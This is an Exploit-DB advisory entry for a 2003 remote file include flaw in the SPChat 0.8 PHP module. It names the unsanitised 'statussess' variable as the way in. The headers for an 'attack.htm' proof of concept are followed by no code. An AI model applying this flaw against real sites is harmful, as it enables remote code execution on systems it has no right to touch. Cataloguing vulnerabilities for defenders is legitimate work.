SPChat 0.8 Module Remote File Include Vulnerability

ID EDB-ID:22717
Type exploitdb
Reporter Rynho Zeros Web
Modified 2003-06-02T00:00:00


SPChat 0.8 Module Remote File Include Vulnerability. Webapps exploit for php platform

                                            source: http://www.securityfocus.com/bid/7780/info

SPChat has been reported prone to a remote file include vulnerability.

The issue presents itself due to insufficient sanitization performed on the user-supplied URI variable 'statussess' by the SPChat module. It is possible for a remote attacker to include a malicious file in a URL.

This vulnerability was reported to affect SPChat version 0.8 other versions may also be affected. 


----- Source Code For attack.htm for eg. -----
----- Source Code For attack.htm -----